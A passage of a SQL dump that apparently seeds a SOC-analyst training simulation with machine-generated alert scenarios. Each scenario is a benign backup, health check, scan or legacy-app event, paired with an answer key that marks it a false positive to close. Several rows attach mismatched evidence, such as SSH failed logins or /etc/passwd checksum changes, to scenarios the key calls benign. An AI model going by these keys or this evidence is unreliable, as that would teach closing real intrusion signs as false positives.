--encrypt\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.306Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"/usr/local/bin/backup.sh --full --encrypt\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.306Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"/usr/local/bin/backup.sh --full --encrypt\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.306Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"/usr/local/bin/backup.sh --full --encrypt\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.306Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event 
count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"/usr/local/bin/backup.sh --full --encrypt\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1795, 'Misconfigured Legacy Application Generates Network Connection Alerts', 'medium', 'Elastic SIEM', 'A legacy application attempting to connect to deprecated ports triggered security alerts. The application is known to operate on outdated protocols.', 'Network Connection', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:20:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.150\",\"dst_ip\":\"10.0.0.8\",\"username\":\"legacy_app_user\",\"hostname\":\"legacy-app-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address for legacy application server.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_connection\",\"analysis_notes\":\"Legacy application is known to attempt connections using outdated protocols and ports.\"}', 'Intermediate', 'SIEM', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.308Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:20:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"legacy_app_user\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.308Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:20:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"legacy_app_user\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.308Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:20:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"legacy_app_user\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.308Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:20:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"legacy_app_user\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.308Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:20:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"legacy_app_user\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1796, 'Benign System Health Check Mistaken for Lateral Movement', 'low', 'Azure Sentinel', 'Scheduled system health checks using internal credentials were flagged as potential lateral movement due to unusual account usage patterns.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:55:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.50\",\"dst_ip\":\"10.0.0.60\",\"username\":\"health_check_user\",\"hostname\":\"health-monitor\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for system health monitoring.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"health_check_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"User account designated for system health checks.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Routine health checks by designated user account were incorrectly flagged.\"}', 'Intermediate', 'SIEM', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.309Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:55:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"health_check_user\\\",\\\"hostname\\\":\\\"health-monitor\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.309Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:55:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"health_check_user\\\",\\\"hostname\\\":\\\"health-monitor\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.309Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:55:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"health_check_user\\\",\\\"hostname\\\":\\\"health-monitor\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.309Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:55:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"health_check_user\\\",\\\"hostname\\\":\\\"health-monitor\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.309Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:55:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"health_check_user\\\",\\\"hostname\\\":\\\"health-monitor\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1797, 'Network Reconnaissance Activity Mistaken for Attack', 'medium', 'Wazuh', 'Internal network reconnaissance scans detected as potential attack activity. The scans are part of regularly scheduled security assessments.', 'Reconnaissance', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.30\",\"dst_ip\":\"10.0.0.40\",\"username\":\"net_recon_user\",\"hostname\":\"network-scanner\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of network scanner used for reconnaissance.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"reconnaissance\",\"analysis_notes\":\"Regularly scheduled network reconnaissance scans were misinterpreted as attack activity.\"}', 'Intermediate', 'SIEM', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.311Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"net_recon_user\\\",\\\"hostname\\\":\\\"network-scanner\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.311Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"net_recon_user\\\",\\\"hostname\\\":\\\"network-scanner\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.311Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"net_recon_user\\\",\\\"hostname\\\":\\\"network-scanner\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.311Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"net_recon_user\\\",\\\"hostname\\\":\\\"network-scanner\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.311Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"net_recon_user\\\",\\\"hostname\\\":\\\"network-scanner\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1798, 'Routine System Health Check Detected as Malware', 'low', 'Splunk', 'A system health check script execution was mistakenly identified as malicious activity. The script ran a series of diagnostic tests on internal systems.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.10\",\"dst_ip\":\"10.0.0.20\",\"username\":\"it_admin\",\"hostname\":\"healthcheck-server\",\"command_line\":\"python3 /scripts/system_health_check.py\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"python3 /scripts/system_health_check.py\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as a legitimate internal diagnostic tool.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in routine operations.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command line matches known diagnostic scripts used by IT for routine health checks.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.312Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"healthcheck-server\\\",\\\"command_line\\\":\\\"python3 /scripts/system_health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.312Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"healthcheck-server\\\",\\\"command_line\\\":\\\"python3 /scripts/system_health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.312Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"healthcheck-server\\\",\\\"command_line\\\":\\\"python3 /scripts/system_health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.312Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"healthcheck-server\\\",\\\"command_line\\\":\\\"python3 /scripts/system_health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.312Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"healthcheck-server\\\",\\\"command_line\\\":\\\"python3 /scripts/system_health_check.py\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1799, 'Authorized Administrative Backup Misclassified as Data Exfiltration', 'medium', 'Elastic SIEM', 'A scheduled administrative backup to an external cloud storage was flagged as potential data exfiltration.', 'Data Exfil', 'T1020', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"198.51.100.25\",\"username\":\"backup_service\",\"hostname\":\"backup-server\",\"request_body\":\"Scheduled backup operation\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for regular backup operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Known cloud storage provider domain used for authorized backups.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"backup_service\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Standard service account for backup operations.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The destination IP is a known cloud storage used for legitimate backup processes.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.314Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"backup_service\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"Scheduled backup operation\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.314Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"backup_service\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"Scheduled backup operation\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.314Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"backup_service\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"Scheduled backup operation\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.314Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"backup_service\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"Scheduled backup operation\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.314Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"backup_service\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"Scheduled backup operation\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1800, 'Misconfigured Legacy App Triggering Lateral Movement Alert', 'medium', 'Wazuh', 'A legacy application performing inter-server communication was flagged as lateral movement due to outdated protocols.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.22\",\"dst_ip\":\"10.0.0.23\",\"username\":\"legacy_app\",\"hostname\":\"server-old\",\"command_line\":\"/usr/bin/legacy_tool --connect\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"/usr/bin/legacy_tool --connect\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Command associated with known legacy application.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of legacy server.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of server communication target.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The legacy application is known to use outdated protocols which can appear suspicious.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.317Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.22\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"server-old\\\",\\\"command_line\\\":\\\"/usr/bin/legacy_tool --connect\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.317Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.22\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"server-old\\\",\\\"command_line\\\":\\\"/usr/bin/legacy_tool 